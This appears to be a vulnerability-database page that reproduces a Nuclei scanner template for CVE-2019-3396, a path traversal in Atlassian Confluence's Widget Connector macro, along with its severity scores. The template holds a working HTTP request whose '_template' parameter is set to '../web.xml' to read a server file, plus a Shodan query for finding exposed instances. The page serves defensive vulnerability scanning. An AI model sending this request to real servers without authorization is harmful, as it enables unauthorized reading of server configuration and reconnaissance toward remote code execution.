Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-3396
HistoryJul 07, 2020 - 7:24 a.m.

Atlassian Confluence Server - Path Traversal

2020-07-0707:24:27
ProjectDiscovery
github.com
10

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.9 High

AI Score

Confidence

High

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.975 High

EPSS

Percentile

100.0%

The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.

id: CVE-2019-3396

info:
  name: Atlassian Confluence Server - Path Traversal
  author: harshbothra_
  severity: critical
  description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
  remediation: |
    Apply the necessary security patches or upgrade to a patched version of Atlassian Confluence Server to mitigate this vulnerability.
  reference:
    - https://github.com/x-f1v3/CVE-2019-3396
    - https://nvd.nist.gov/vuln/detail/CVE-2019-3396
    - https://jira.atlassian.com/browse/CONFSERVER-57974
    - http://packetstormsecurity.com/files/152568/Atlassian-Confluence-Widget-Connector-Macro-Velocity-Template-Injection.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-3396
    cwe-id: CWE-22
    epss-score: 0.97508
    epss-percentile: 0.9998
    cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: atlassian
    product: confluence
    shodan-query: http.component:"Atlassian Confluence"
  tags: cve,cve2019,atlassian,confluence,lfi,rce,kev,packetstorm

http:
  - raw:
      - |
        POST /rest/tinymce/1/macro/preview HTTP/1.1
        Host: {{Hostname}}
        Referer: {{Hostname}}

        {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<param-name>contextConfigLocation</param-name>"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ebb30686679c484918c378d4f6de1efbf081a62a2c405ed8a07161e6f426ee44022100a65d9e1e0047c1d65157e0eaea76448e5c88e2b4a63bfad7e621954b0bf7a9b9:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.9 High

AI Score

Confidence

High

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.975 High

EPSS

Percentile

100.0%